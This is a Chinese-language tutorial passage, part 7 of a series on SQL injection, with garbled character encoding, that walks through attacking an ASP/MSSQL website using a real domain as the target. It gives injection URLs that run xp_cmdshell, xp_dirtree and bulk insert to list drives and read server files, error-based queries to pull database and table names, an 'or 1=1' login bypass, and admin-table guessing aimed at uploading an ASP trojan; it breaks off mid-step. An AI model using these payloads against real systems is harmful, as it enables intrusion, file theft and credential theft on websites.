SQL注入漏洞的攻防策略(7)
GO ON~!
當(dāng)上述條件不成立時(shí)就要繼續(xù)下面的步驟
(一)、發(fā)現(xiàn)WEB虛擬目錄
只有找到WEB虛擬目錄,才能確定放置ASP木馬的位置,進(jìn)而得到USER權(quán)限。有兩種方法比較有效。
一是根據(jù)經(jīng)驗(yàn)猜解,一般來說,WEB虛擬目錄是:c:/inetpub/wwwroot;
D:/inetpub/wwwroot; E:/inetpub/wwwroot等,而可執(zhí)行虛擬目錄是:
c:/inetpub/scripts; D:/inetpub/scripts; E:/inetpub/scripts等。
二是遍歷系統(tǒng)的目錄結(jié)構(gòu),分析結(jié)果并發(fā)現(xiàn)WEB虛擬目錄;
先創(chuàng)建一個(gè)臨時(shí)表:temp
HTTP://www.163.com/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2
nvarchar(255),num3
nvarchar(255));--
接下來:
1 我們可以利用xp_availablemedia來獲得當(dāng)前所有驅(qū)動(dòng)器,并存入temp表中:
HTTP://www.163.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--
我們可以通過查詢temp的內(nèi)容來獲得驅(qū)動(dòng)器列表及相關(guān)信息
2 我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中:
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:/';--
3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結(jié)構(gòu),并寸入temp表中:
HTTP://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree
'c:/';--
這樣就可以成功的瀏覽到所有的目錄(文件夾)列表:
如果我們需要查看某個(gè)文件的內(nèi)容,可以通過執(zhí)行xp_cmdsell:
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type
c:/web/index.asp';--
使用'bulk insert'語法可以將一個(gè)文本文件插入到一個(gè)臨時(shí)表中。如:bulk insert temp(id) from
'c:/inetpub/wwwroot/index.asp'
瀏覽temp就可以看到index.asp文件的內(nèi)容了!通過分析各種ASP文件,可以得到大量系統(tǒng)信息,WEB建設(shè)
與管理信息,甚至可以得到SA帳號(hào)的連接密碼。
當(dāng)然,如果xp_cmshell能夠執(zhí)行,我們可以用它來完成:
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir
c:/';--
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/
*.asp /s/a';--
通過xp_cmdshell我們可以看到所有想看到的,包括W3svc
HTTP://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc'
但是,如果不是SA權(quán)限,我們還可以使用
HTTP://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree
'c:/';--
注意:
1、以上每完成一項(xiàng)瀏覽后,應(yīng)刪除TEMP中的所有內(nèi)容,刪除方法是:
HTTP://www.163.com/news.asp?id=xx;delete from temp;--
2、瀏覽TEMP表的方法是:(假設(shè)TestDB是當(dāng)前連接的數(shù)據(jù)庫名)
HTTP://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0
得到表TEMP中第一條記錄id字段的值,并與整數(shù)進(jìn)行比較,顯然news.asp工作異常,但在異常中卻可
以發(fā)現(xiàn)id字段的值。假設(shè)發(fā)現(xiàn)的表名是xyz,則
HTTP://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id
not in('xyz'))>0
得到表TEMP中第二條記錄id字段的值。
(二)、上傳ASP木馬
所謂ASP木馬,就是一段有特殊功能的ASP代碼,并放入WEB虛擬目錄的Scripts下,遠(yuǎn)程客戶通過IE就
可執(zhí)行它,進(jìn)而得到系統(tǒng)的USER權(quán)限,實(shí)現(xiàn)對(duì)系統(tǒng)的初步控制。上傳ASP木馬一般有兩種比較有效的方法
?。?/p>
1、利用WEB的遠(yuǎn)程管理功能
許多WEB站點(diǎn),為了維護(hù)的方便,都提供了遠(yuǎn)程管理的功能;也有不少WEB站點(diǎn),其內(nèi)容是對(duì)于不同的
用戶有不同的訪問權(quán)限。為了達(dá)到對(duì)用戶權(quán)限的控制,都有一個(gè)網(wǎng)頁,要求用戶名與密碼,只有輸入了正
確的值,才能進(jìn)行下一步的操作,可以實(shí)現(xiàn)對(duì)WEB的管理,如上傳、下載文件,目錄瀏覽、修改配置等。
因此,若獲取正確的用戶名與密碼,不僅可以上傳ASP木馬,有時(shí)甚至能夠直接得到USER權(quán)限而瀏覽
系統(tǒng),上一步的“發(fā)現(xiàn)WEB虛擬目錄”的復(fù)雜操作都可省略。
用戶名及密碼一般存放在一張表中,發(fā)現(xiàn)這張表并讀取其中內(nèi)容便解決了問題。以下給出兩種有效方
法。
A、 注入法:
從理論上說,認(rèn)證網(wǎng)頁中會(huì)有型如:
select * from admin where username='XXX' and password='YYY' 的語句,若在正式運(yùn)行此句之前
,沒有進(jìn)行必要的字符過濾,則很容易實(shí)施SQL注入。
如在用戶名文本框內(nèi)輸入:abc’ or 1=1-- 在密碼框內(nèi)輸入:123 則SQL語句變成:
select * from admin where username='abc’ or 1=1 and password='123’
不管用戶輸入任何用戶名與密碼,此語句永遠(yuǎn)都能正確執(zhí)行,用戶輕易騙過系統(tǒng),獲取合法身份。
B、猜解法:
基本思路是:猜解所有數(shù)據(jù)庫名稱,猜出庫中的每張表名,分析可能是存放用戶名與密碼的表名,猜
出表中的每個(gè)字段名,猜出表中的每條記錄內(nèi)容。
a 猜解所有數(shù)據(jù)庫名稱
HTTP://www.163.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where
name>1 and dbid=6) <>0
因?yàn)閐bid的值從1到5,是系統(tǒng)用了。所以用戶自己建的一定是從6開始的。并且我們提交了 name>1
(name字段是一個(gè)字符型的字段和數(shù)字比較會(huì)出錯(cuò)),news.asp工作異常,可得到第一個(gè)數(shù)據(jù)庫名,同理把D
BID分別改成7,8,9,10,11,12…就可得到所有數(shù)據(jù)庫名。
以下假設(shè)得到的數(shù)據(jù)庫名是TestDB。
b 猜解數(shù)據(jù)庫中用戶名表的名稱
猜解法:此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜表名,一般來說,
user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuse
r,
systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并通過語句進(jìn)行判斷
HTTP://www.163.com/news.asp?id=xx and (select count(*) from TestDB.dbo.表名)>0 若表名存
在,則news.asp工作正常,否則異常。如此循環(huán),直到猜到系統(tǒng)帳號(hào)表的名稱。
讀取法:SQL-SERVER有一個(gè)存放系統(tǒng)核心信息的表sysobjects,有關(guān)一個(gè)庫的所有表,視圖等信息全
部存放在此表中,而且此表可以通過WEB進(jìn)行訪問。
當(dāng)xtype='U' and status>0代表是用戶建立的表,發(fā)現(xiàn)并分析每一個(gè)用戶建立的表及名稱,便可以
得到用戶名表的名稱,基本的實(shí)現(xiàn)方法是:
?、貶TTP://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects
where xtype='U' and status>0 )>0
得到第一個(gè)用戶建立表的名稱,并與整數(shù)進(jìn)行比較,顯然news.asp工作異常,但在異常中卻可以發(fā)現(xiàn)表的
名稱。假設(shè)發(fā)現(xiàn)的表名是xyz,則
?、贖TTP://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects
where xtype='U' and status>0 and
name not in('xyz'))>0 可以得到第二個(gè)用戶建立的表的名稱,同理就可得到所有用建立的表的名稱。
根據(jù)表的名稱,一般可以認(rèn)定那張表用戶存放用戶名及密碼,以下假設(shè)此表名為Admin。
c 猜解用戶名字段及密碼字段名稱
admin表中一定有一個(gè)用戶名字段,也一定有一個(gè)密碼字段,只有得到此兩個(gè)字段的名稱,才有可能
得到此兩字段的內(nèi)容。如何得到它們的名稱呢,同樣有以下兩種方法。